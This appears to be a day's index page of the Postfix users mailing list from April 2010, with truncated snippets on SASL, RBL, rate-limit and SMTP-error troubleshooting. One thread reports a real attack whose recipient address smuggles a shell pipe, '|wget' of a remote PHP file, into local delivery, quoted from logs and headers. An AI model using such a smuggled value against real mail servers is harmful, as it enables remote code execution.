Re: mailbox_command

2010-04-22 Thread /dev/rob0
On Thu, Apr 22, 2010 at 05:20:37PM +0200, Danny wrote: > I am running Debian 5.4 with postfix 2.5.5-1.1, fetchmail > 6.3.9rc2-4 and procmail 3.22-16. > > Now, before I upgraded to Debian 5.4 I had Debian 4.0 running the > same postfix, fetchmail & procmail setup(with different versions > obviou

Re: [mailer-dae...@doctor.nl2k.ab.ca: Postfix SMTP server: errors from mail-iw0-f172.google.com[209.85.223.172]]

2010-04-22 Thread Victor Duchovni
On Thu, Apr 22, 2010 at 06:35:52PM -0400, Bill Cole wrote: >> In: DATA >> Out: 354 End data with. >> Out: 451 4.3.0 Error: queue file write error > > http://www.postfix.org/SMTPD_PROXY_README.html explains one possible source > of this: inability to connect to a before-queue proxy. This i

Re: Using Sasl authentication and RBL

2010-04-22 Thread David Cottle
Sent from my iPhone On 23/04/2010, at 10:10, Noel Jones wrote: On 4/22/2010 6:54 PM, webmas...@aus-city.com wrote: I do see some auth stuff in the logs, I put a snip: Apr 21 05:05:31 server postfix/smtpd[21639]: connect from unknown[xx.xx.xx.xx] Apr 21 05:05:31 server postfix/smtpd[21639

Re: Using Sasl authentication and RBL

2010-04-22 Thread Noel Jones
On 4/22/2010 6:54 PM, webmas...@aus-city.com wrote: I do see some auth stuff in the logs, I put a snip: Apr 21 05:05:31 server postfix/smtpd[21639]: connect from unknown[xx.xx.xx.xx] Apr 21 05:05:31 server postfix/smtpd[21639]: NOQUEUE: client=unknown[xx.xx.xx.xx], sasl_method=PLAIN, sasl_user

Re: Using Sasl authentication and RBL

2010-04-22 Thread Noel Jones
On 4/22/2010 6:17 PM, Oliver Schinagl wrote: Well what I'm after is the following: Postfix should be nice and locked, no relaying or anything like that; backup_max's should be allowed to relay of course, and users who have logged in properly via, say thunderbird (using sasl_auth). Also I would

Re: Using Sasl authentication and RBL

2010-04-22 Thread webmaster
Quoting Noel Jones : On 4/22/2010 6:19 PM, webmas...@aus-city.com wrote: Seems its plesk and not logging everything in the logs. It uses its own logging for mail, I could not find my successful login (below). The saslauthd is not running, but plesk must start use another process to do this, bu

Re: Using Sasl authentication and RBL

2010-04-22 Thread Noel Jones
On 4/22/2010 6:19 PM, webmas...@aus-city.com wrote: Seems its plesk and not logging everything in the logs. It uses its own logging for mail, I could not find my successful login (below). The saslauthd is not running, but plesk must start use another process to do this, but its is running: Log

Re: Using Sasl authentication and RBL

2010-04-22 Thread webmaster
Quoting Noel Jones : On 4/22/2010 8:00 AM, webmas...@aus-city.com wrote: Quoting Noel Jones : On 4/22/2010 12:10 AM, David Cottle wrote: I tried running testsaslauthd -u usermailname -p matchingpass -s smtp I get connect () : No such file or directory You need to debug your sasl insta

Re: Using Sasl authentication and RBL

2010-04-22 Thread Oliver Schinagl
On 04/23/10 00:45, Noel Jones wrote: > On 4/22/2010 5:16 PM, Oliver Schinagl wrote: >> On 04/22/10 19:21, /dev/rob0 wrote: >>> On Wed, Apr 21, 2010 at 09:49:49PM -0500, Noel Jones wrote: >>> "submission" is commented out in the default postfix config because a relatively small subset of f

Re: [mailer-dae...@doctor.nl2k.ab.ca: Postfix SMTP server: errors from mail-iw0-f172.google.com[209.85.223.172]]

2010-04-22 Thread The Doctor
On Thu, Apr 22, 2010 at 06:35:52PM -0400, Bill Cole wrote: > The Doctor wrote, On 4/22/10 5:38 PM: >> First off apologies for the rather sharp tone: >> >> A case of too many agngry customers breathing down the neck. >> >> Anyhow I have been since recover been getting many of these: >> >> - Forw

Re: [mailer-dae...@doctor.nl2k.ab.ca: Postfix SMTP server: errors from mail-iw0-f172.google.com[209.85.223.172]]

2010-04-22 Thread Bill Cole
brian moore wrote, On 4/22/10 6:02 PM: Google -does- usually use ESMTP, so it really looks like you have a Pix running SMTP Fixup, which doesn't fix anything at all. It can fix the problem of receiving too much mail. :) It should be noted that the Cisco ASA also has this misfeature, and repo

Re: Using Sasl authentication and RBL

2010-04-22 Thread Noel Jones
On 4/22/2010 5:16 PM, Oliver Schinagl wrote: On 04/22/10 19:21, /dev/rob0 wrote: On Wed, Apr 21, 2010 at 09:49:49PM -0500, Noel Jones wrote: "submission" is commented out in the default postfix config because a relatively small subset of folks using postfix need it, and it's not nice to open p

Re: Set submission as to bypass RBLs

2010-04-22 Thread webmaster
Quoting Noel Jones : On 4/22/2010 7:59 AM, webmas...@aus-city.com wrote: Sorry its got all truncated. Where exactly do I need to add that in here? (I added a extra line between each) plesk_virtual unix - n n - - pipe flags=DORhu user=popuser:popuser argv=/usr/lib/plesk-9.0/postfix-local -f ${

Re: [mailer-dae...@doctor.nl2k.ab.ca: Postfix SMTP server: errors from mail-iw0-f172.google.com[209.85.223.172]]

2010-04-22 Thread Bill Cole
The Doctor wrote, On 4/22/10 5:38 PM: First off apologies for the rather sharp tone: A case of too many agngry customers breathing down the neck. Anyhow I have been since recover been getting many of these: - Forwarded message from Mail Delivery System - X-Spam-Checker-Version: Spam

Re: Using Sasl authentication and RBL

2010-04-22 Thread Oliver Schinagl
On 04/22/10 19:21, /dev/rob0 wrote: > On Wed, Apr 21, 2010 at 09:49:49PM -0500, Noel Jones wrote: > >> "submission" is commented out in the default postfix config because >> a relatively small subset of folks using postfix need it, and it's >> not nice to open ports not needed. >> > I wou

Re: [mailer-dae...@doctor.nl2k.ab.ca: Postfix SMTP server: errors from mail-iw0-f172.google.com[209.85.223.172]]

2010-04-22 Thread brian moore
On Thu, 22 Apr 2010 15:38:06 -0600 The Doctor wrote: > Out: 220 doctor.nl2k.ab.ca ESMTP Postfix (2.8-20100323) > In: mail-iw0-f172.google.com > Out: 402 4.5.2 Error: command not recognized is not a valid SMTP/ESMTP command. Are you using a Pix? > Out: 451 4.3.0 Error: queue fi

[mailer-dae...@doctor.nl2k.ab.ca: Postfix SMTP server: errors from mail-iw0-f172.google.com[209.85.223.172]]

2010-04-22 Thread The Doctor
First off apologies for the rather sharp tone: A case of too many agngry customers breathing down the neck. Anyhow I have been since recover been getting many of these: - Forwarded message from Mail Delivery System - X-Spam-Checker-Version: SpamAssassin 3.3.1 (2010-03-16) on doctor.nl

Re: [OT] sql lower (WAS: OT: Cyrus-sasl + virtual_mailbox_maps query - lowercase username)

2010-04-22 Thread mouss
Charles Marcus a écrit : > On 2010-04-21 5:53 PM, mouss wrote: >> Charles Marcus a écrit : >>> I know this isn't exactly a postfix question, but I'm hoping someone >>> will have pity on me and answer anyway... >>> >>> I have a server using postfix+courier-imap+cyrus-sasl. Currently the >>> query in

Re: Using Sasl authentication and RBL

2010-04-22 Thread /dev/rob0
On Wed, Apr 21, 2010 at 09:49:49PM -0500, Noel Jones wrote: > "submission" is commented out in the default postfix config because > a relatively small subset of folks using postfix need it, and it's > not nice to open ports not needed. I would say that the subset is (or will soon be) a majority

Re: Receiving bounce messages back to local-host

2010-04-22 Thread CT
CT wrote: Noel Jones wrote: On 4/18/2010 4:40 PM, groups wrote: Noel Jones wrote, On 04/18/2010 04:20 PM: On 4/18/2010 4:16 PM, groups wrote: Postfix logs help you know what happened to a particular message. Look in your logs for bounces (sender=<>) arriving from your relayhost, and see w

Re: Attack via manipulated recipient: root+:|wget http://fortunes.in/x1x.php, bypasses alias mechanism

2010-04-22 Thread Arno Schäfer
Excellent, that makes everything clear. Thanks a lot, Arno On 22.04.2010 15:41, Wietse Venema wrote: > Arno Sch�fer: > [ Charset ISO-8859-1 unsupported, converting... ] >> On 22.04.2010 14:47, Wietse Venema wrote: >>> Arno Sch?fer: Apr 9 17:54:55 www postfix/local[6819]: warning: 800FC354

Re: rate limiting by recipient domain

2010-04-22 Thread Michael P. Soulier
On Thu, Apr 22, 2010 at 8:07 AM, Wietse Venema wrote: > > Per-destination rate delay was introduced two major releases ago. > http://www.postfix.org/postconf.5.html#transport_destination_rate_delay > > Note: this inserts the specified delay after each delivery via the > named transport, over a sin

Re: Attack via manipulated recipient: root+:|wget http://fortunes.in/x1x.php, bypasses alias mechanism

2010-04-22 Thread Wietse Venema
Arno Sch?fer: [ Charset ISO-8859-1 unsupported, converting... ] > On 22.04.2010 14:47, Wietse Venema wrote: > > Arno Sch?fer: > >> Apr 9 17:54:55 www postfix/local[6819]: warning: 800FC35405B: address > >> with illegal extension: root+:|wget http://fortunes.in/x1x.php > > > > You did't mention in

mailbox_command

2010-04-22 Thread Danny
Hi guys, I am running Debian 5.4 with postfix 2.5.5-1.1, fetchmail 6.3.9rc2-4 and procmail 3.22-16. Now, before I upgraded to Debian 5.4 I had Debian 4.0 running the same postfix, fetchmail & procmail setup(with different versions obviously). Fetchmail got the mail, gave it to procmail via the (

Re: Using Sasl authentication and RBL

2010-04-22 Thread Noel Jones
On 4/22/2010 8:00 AM, webmas...@aus-city.com wrote: Quoting Noel Jones : On 4/22/2010 12:10 AM, David Cottle wrote: I tried running testsaslauthd -u usermailname -p matchingpass -s smtp I get connect () : No such file or directory You need to debug your sasl installation. -- Noel Jones

Re: [OT] sql lower (WAS: OT: Cyrus-sasl + virtual_mailbox_maps query - lowercase username)

2010-04-22 Thread Charles Marcus
On 2010-04-21 5:53 PM, mouss wrote: > Charles Marcus a écrit : >> I know this isn't exactly a postfix question, but I'm hoping someone >> will have pity on me and answer anyway... >> >> I have a server using postfix+courier-imap+cyrus-sasl. Currently the >> query in virtual_mailbox_maps is: >> >> q

Re: Set submission as to bypass RBLs

2010-04-22 Thread Noel Jones
On 4/22/2010 7:59 AM, webmas...@aus-city.com wrote: > Sorry its got all truncated. Where exactly do I need to add that in here? (I added a extra line between each) plesk_virtual unix - n n - - pipe flags=DORhu user=popuser:popuser argv=/usr/lib/plesk-9.0/postfix-local -f ${sender} -d ${recipient

Re: Attack via manipulated recipient: root+:|wget http://fortunes.in/x1x.php, bypasses alias mechanism

2010-04-22 Thread Arno Schäfer
On 22.04.2010 14:47, Wietse Venema wrote: > Arno Schäfer: >> Apr 9 17:54:55 www postfix/local[6819]: warning: 800FC35405B: address >> with illegal extension: root+:|wget http://fortunes.in/x1x.php > > You did't mention in the initial report that Postfix rejected the > extension, because that make

Re: Using Sasl authentication and RBL

2010-04-22 Thread webmaster
Quoting Noel Jones : On 4/22/2010 12:10 AM, David Cottle wrote: I tried running testsaslauthd -u usermailname -p matchingpass -s smtp I get connect () : No such file or directory You need to debug your sasl installation. -- Noel Jones Hi Noel, Any idea where to start as this is pr

Re: Set submission as to bypass RBLs

2010-04-22 Thread webmaster
Quoting Noel Jones : On 4/21/2010 10:15 PM, David Cottle wrote: Sent from my iPhone On 22/04/2010, at 12:00, Noel Jones wrote: On 4/21/2010 6:35 PM, David Cottle wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I am having some issues with my server blocking ISP IP addresses. I kno

Re: Attack via manipulated recipient: root+:|wget http://fortunes.in/x1x.php, bypasses alias mechanism

2010-04-22 Thread Wietse Venema
Arno Sch??fer: > Apr 9 17:54:55 www postfix/local[6819]: warning: 800FC35405B: address > with illegal extension: root+:|wget http://fortunes.in/x1x.php You did't mention in the initial report that Postfix rejected the extension, because that makes all the difference in the world. Apparently, the

Re: Set submission as to bypass RBLs

2010-04-22 Thread Noel Jones
On 4/21/2010 10:15 PM, David Cottle wrote: Sent from my iPhone On 22/04/2010, at 12:00, Noel Jones wrote: On 4/21/2010 6:35 PM, David Cottle wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I am having some issues with my server blocking ISP IP addresses. I know a recent update to pl

Re: Using Sasl authentication and RBL

2010-04-22 Thread Noel Jones
On 4/22/2010 12:10 AM, David Cottle wrote: I tried running testsaslauthd -u usermailname -p matchingpass -s smtp I get connect () : No such file or directory You need to debug your sasl installation. -- Noel Jones

Re: Using Sasl authentication and RBL

2010-04-22 Thread Noel Jones
On 4/22/2010 7:02 AM, Oliver Schinagl wrote: But I don't think this will fix my initial issue, with clients being rejected on the RBL Auth issue does it? I think I did read that smtpd_delay_reject was good. Then it's a different issue. Show "postconf -n" and logs of the unwanted behavior. I

Re: rate limiting by recipient domain

2010-04-22 Thread Wietse Venema
Michael P. Soulier: > Hello, > > Is there a way to configure postfix such that sending bulk email (ie. a > mailing list) can be rate limited by the recipient domain? > > I saw in the documentation that you can control the number of > concurrent connections to the same destination, but I'd like to

Re: Using Sasl authentication and RBL

2010-04-22 Thread Oliver Schinagl
On 04/22/10 04:49, Noel Jones wrote: > On 4/21/2010 9:03 PM, Oliver Schinagl wrote: >> On 04/22/10 03:55, Noel Jones wrote: >>> On 4/21/2010 8:39 PM, Oliver Schinagl wrote: > Heh, I suppose it wasn't as straightforward as that; I'll look more into it after some sleep, I enabled i

Re: Attack via manipulated recipient: root+:|wget http://fortunes.in/x1x.php, bypasses alias mechanism

2010-04-22 Thread Arno Schäfer
On 22.04.2010 12:50, Wietse Venema wrote: > Arno Sch�fer: >> Hi, >> >> I just received the following mail in my root account's local inbox: >> >> >From b...@dick.com Fri Apr 9 17:54:55 2010 >> Return-Path: >> X-Original-To: "root+:|wget http://fortunes.in/x1x.php"; >> Delivered-To: "root+:|wget

Re: Attack via manipulated recipient: root+:|wget http://fortunes.in/x1x.php, bypasses alias mechanism

2010-04-22 Thread Wietse Venema
Arno Sch?fer: > Hi, > > I just received the following mail in my root account's local inbox: > > >From b...@dick.com Fri Apr 9 17:54:55 2010 > Return-Path: > X-Original-To: "root+:|wget http://fortunes.in/x1x.php"; > Delivered-To: "root+:|wget http://fortunes.in/x1x.php"@somedomain.de > Receiv

rate limiting by recipient domain

2010-04-22 Thread Michael P. Soulier
Hello, Is there a way to configure postfix such that sending bulk email (ie. a mailing list) can be rate limited by the recipient domain? I saw in the documentation that you can control the number of concurrent connections to the same destination, but I'd like to control the rate that the email i

Attack via manipulated recipient: root+:|wget http://fortunes.in/x1x.php, bypasses alias mechanism

2010-04-22 Thread Arno Schäfer
Hi, I just received the following mail in my root account's local inbox: >From b...@dick.com Fri Apr 9 17:54:55 2010 Return-Path: X-Original-To: "root+:|wget http://fortunes.in/x1x.php"; Delivered-To: "root+:|wget http://fortunes.in/x1x.php"@somedomain.de Received: from bluedick (unknown [208.

Re: Postfix sending NDR instead of rejecting in SMTP session

2010-04-22 Thread Ansgar Wiechers
On 2010-04-22 Vegard Svanberg wrote: > * Ansgar Wiechers [2010-04-21 13:11]: > >>> Example 2: u...@example.invalid is forwarded to r...@example2.invalid. >>> r...@example2.invalid does not exist; neither as an alias nor a mailbox. >>> >>> SMTP dialog: >>> >>> rcpt to: >>> 250 2.1.5 Ok >> >> T

Re: Postfix sending NDR instead of rejecting in SMTP session

2010-04-22 Thread Vegard Svanberg
* Ansgar Wiechers [2010-04-21 13:11]: > > Example 2: u...@example.invalid is forwarded to r...@example2.invalid. > > r...@example2.invalid does not exist; neither as an alias nor a mailbox. > > > > SMTP dialog: > > > > rcpt to: > > 250 2.1.5 Ok > > This is expected behavior as well. Postfix o